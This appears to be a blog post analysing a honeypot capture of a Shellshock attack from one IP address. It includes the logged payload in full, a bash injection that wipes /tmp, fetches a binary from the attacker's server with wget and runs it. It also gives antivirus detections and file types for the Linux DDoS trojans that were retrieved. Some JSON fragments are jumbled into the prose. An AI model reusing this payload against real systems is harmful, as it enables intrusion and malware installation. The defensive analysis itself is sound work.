{"message":"Jul 13 06:38:52 localhost [mypyfwa] 2015-07-13 06:38:52.540616 211.147.2.192 - - [12/Jul/2015:20:48:02 +0200] \"GET / HTTP/1.1\" 404 442 \"() { :; }; /bin/bash -c \\\"rm -rf /tmp/*;echo wget http://211.147.2.192:911/1122.64 -O /tmp/China.Z-oxdn\\x18 >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-oxdn\\x18 >> /tmp/Run.sh;echo /tmp/China.Z-oxdn\\x18 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\\\"\" \"() { :; }; /bin/bash -c \\\"rm -rf /tmp/*;echo wget http://211.147.2.192:911/1122.64 -O /tmp/China.Z-oxdn\\x18 >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-oxdn\\x18 >> /tmp/Run.sh;echo /tmp/China.Z-oxdn\\x18 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\\\"\" 211.147.2.192 CN SHELLinjection","@version":"1","@timestamp":"2015-07-13T04:38:52.586Z","type":"syslog","file":"/var/log/smsids.log","host":"beeswarm","offset":"26328","tags":["_grokparsefailure"],"syslog_severity_code":5,"syslog_facility_code":1,"syslog_facility":"user-level","syslog_severity":"notice"}
All attacks were originated from the same source IP:
- 211.147.2.192
"ip": "211.147.2.192",There were three different files within the attacks
"subnets": [
{
"categoryDescriptions": {},
"cats": {},
"created": "2012-03-22T07:26:00.000Z",
"geo": {
"country": "China",
"countrycode": "CN"
},
- ./1122.32: Linux.Trojan.IptabLex FOUND
- ./1122.64: Linux.Trojan.IptabLex FOUND
- ./8uc: Unix.Trojan.DDoS_XOR-1 FOUND
pi@raspberrypi ~/ana $ file 1122.32
1122.32: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically li nked, for GNU/Linux 2.6.9, not stripped
pi@raspberrypi ~/ana $ file 1122.64
1122.64: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
pi@raspberrypi ~/ana $ file 8uc
8uc: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked , for GNU/Linux 2.6.9, not stripped
Keine Kommentare:
Kommentar veröffentlichen